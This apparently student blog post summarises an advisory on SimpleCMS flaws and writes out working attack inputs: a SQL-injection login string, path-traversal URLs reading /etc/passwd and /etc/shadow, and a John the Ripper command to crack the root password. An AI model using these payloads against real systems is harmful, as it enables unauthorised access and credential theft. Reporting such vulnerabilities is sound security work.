Simple CMS – when things can go really wrong

On 28th of March, Bugtraq announced multiple vulnerabilities of the SimpleCMS Content management system.

First of them is that the page admin/application/plugins/scaffold/index.php is vulnerable to Cross Site Scripting exploits.

The second vulnerability which allows user to use SQL injections to log in to the administrator section. The following log on credentials will

user: admin ‘ or ‘ 1=1
pass: password

will produce the next error

SELECT * FROM accounts WHERE username =’admin’ or 1=1′ and password =’9f6e6800cfae7749eb6c486619254b9c’:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” and password =’9f6e6800cfae7749eb6c486619254b9c” at line 1

After analyzing the error, the attacker could use the following credentials to gain full access to administration section:

user: admin ‘ or ‘ 1=1
pass: password

The most dangerous exploit is the third one which allows the attacker to download a remote file from the computer.

By accessing the links http://simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/passwd&page=&section=pages
and http://simpliscms/admin/index.php?action=do_download&download_file=../../../../../../../etc/shadow&page=&section=pages1
the attacker can retrieve the file /etc/passwd and /etc/shadow

Using the software John The Ripper, by running

$ unshadow passwd shadow > mypasswd && john –-users=root mypasswd

the root password from the host computer can be found. After that the attacker is able to SSH into the hosting system.

Currently, there are no vendor-supplied patches for the exploits.


About Stefan Fodor

inscriptie pe un mormant
This entry was posted in IT Security, Week 13 and tagged . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s